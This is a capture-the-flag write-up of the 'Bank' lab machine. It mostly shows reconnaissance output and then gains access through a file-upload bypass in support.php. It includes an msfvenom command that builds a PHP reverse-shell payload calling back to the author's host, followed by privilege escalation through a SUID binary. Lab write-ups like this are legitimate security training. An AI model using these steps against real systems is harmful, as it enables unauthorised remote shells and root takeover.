Difficulty Rating:

Machine: Bank
OS: Linux
IP: 10.10.10.29

  • Nmap
$ nmap -A 10.10.10.29

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-28 14:17 IST
Nmap scan report for 10.10.10.29
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|_  256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.91 seconds
  • Nikto
$ nikto -h http://10.10.10.29
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.29
+ Target Hostname:    10.10.10.29
+ Target Port:        80
+ Start Time:         2017-07-28 09:38:24 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2cf6 0x5509adba7a45d 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7500 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2017-07-28 10:01:54 (GMT5.5) (1410 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • Dirb
$ dirb http://10.10.10.29

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 28 09:37:58 2017
URL_BASE: http://10.10.10.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612          
---- Scanning URL: http://10.10.10.29/ ----
+ http://10.10.10.29/index.html (CODE:200|SIZE:11510)                                                                         
+ http://10.10.10.29/server-status (CODE:403|SIZE:291)                                                                                 
                                                                                                                                                                                             
-----------------
END_TIME: Fri Jul 28 09:51:41 2017
DOWNLOADED: 4612 - FOUND: 2
  • Port 53 seems interesting. Let’s try zone transfer attack.
  • After some guessing, I found out that domain bank.htb works.
  • Let’s add it to /etc/hosts

  • Also dig command shows that bank.htb works
 $ dig @10.10.10.29 bank.htb
; <<>> DiG 9.10.3-P4-Debian <<>> @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3082
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;bank.htb.			IN	A

;; ANSWER SECTION:
bank.htb.		604800	IN	A	10.10.10.29

;; AUTHORITY SECTION:
bank.htb.		604800	IN	NS	ns.bank.htb.

;; ADDITIONAL SECTION:
ns.bank.htb.		604800	IN	A	10.10.10.29

;; Query time: 145 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Fri Jul 28 15:28:54 IST 2017
;; MSG SIZE  rcvd: 86
  • Dnsrecon
$ dnsrecon -d bank.htb -n 10.10.10.29
[*] Performing General Enumeration of Domain: bank.htb
[-] DNSSEC is not configured for bank.htb
[*] 	 SOA bank.htb 10.10.10.29
[*] 	 NS ns.bank.htb 10.10.10.29
[*] 	 Bind Version for 10.10.10.29 9.9.5-3ubuntu0.14-Ubuntu
[-] Could not Resolve MX Records for bank.htb
[*] 	 A bank.htb 10.10.10.29
[*] Enumerating SRV Records
[-] No SRV Records Found for bank.htb
[*] 0 Records Found
  • Dnsenum
$ dnsenum --dnsserver 10.10.10.29 bank.htb
dnsenum.pl VERSION:1.2.3

-----   bank.htb   -----


Host's addresses:
__________________

bank.htb.                                604800   IN    A        10.10.10.29


Name Servers:
______________

ns.bank.htb.                             604800   IN    A        10.10.10.29


Mail (MX) Servers:
___________________



Trying Zone Transfers and getting Bind Versions:
_________________________________________________

unresolvable name: ns.bank.htb at /usr/bin/dnsenum line 842.

Trying Zone Transfer for bank.htb on ns.bank.htb ... 
AXFR record query failed: no nameservers

brute force file not specified, bay.
  • Dirb on bank.htb
dirb http://bank.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 28 15:16:16 2017
URL_BASE: http://bank.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bank.htb/ ----
==> DIRECTORY: http://bank.htb/assets/                                                                                                                                                       
==> DIRECTORY: http://bank.htb/inc/                                                                                                                                                          
+ http://bank.htb/index.php (CODE:302|SIZE:7322)                                                                                                                                             
+ http://bank.htb/server-status (CODE:403|SIZE:288)                                                                                                                                          
==> DIRECTORY: http://bank.htb/uploads/                                                                                                                                                      
                                                                                                                                                                                             
---- Entering directory: http://bank.htb/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                             
---- Entering directory: http://bank.htb/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                             
---- Entering directory: http://bank.htb/uploads/ ----
                                                                                                                                                                                             
-----------------
END_TIME: Fri Jul 28 15:48:18 2017
DOWNLOADED: 9224 - FOUND: 2

  • Dirb to search for only php pages
dirb http://bank.htb -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 28 16:32:38 2017
URL_BASE: http://bank.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bank.htb/ ----
+ http://bank.htb/index.php (CODE:302|SIZE:7322)                                                 \         
+ http://bank.htb/login.php (CODE:200|SIZE:1974)                                
+ http://bank.htb/logout.php (CODE:302|SIZE:0)                                          
+ http://bank.htb/support.php (CODE:302|SIZE:3291)                            
                                                                                                                                                                                             
-----------------
END_TIME: Fri Jul 28 16:50:30 2017
DOWNLOADED: 4612 - FOUND: 4
  • Start Burp suite and intercept requests and responses from 10.10.10.29
  • Go to bank.htb/support.php
  • You’ll get a form from where you can upload a file.
  • Upload a payload with extension “.htb” (Read comments from support.php)

$ msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.15.16 LPORT=4444 > r2.htb

  • You get shell and from there you can own user Chris.
  • To own system look out for suid
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24  2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May  8  2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21  2013 /usr/bin/mtr
-rwsr-xr-- 1 root dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
-rwsr-xr-x 1 root root 30112 May 15  2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24  2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24  2016 /bin/umount
  • /var/htb/bin/emergency looks interesting
$ cd /var/htb/bin/
$ ./emergency /root
$ ./emergency ls
$ ./emergency: 0: Can't open ls
$ ./emergency /root/root.txt
/root/root.txt: 1: /root/root.txt: XXXXXXXXXX: not found
User and Root owned!!

Share the fun!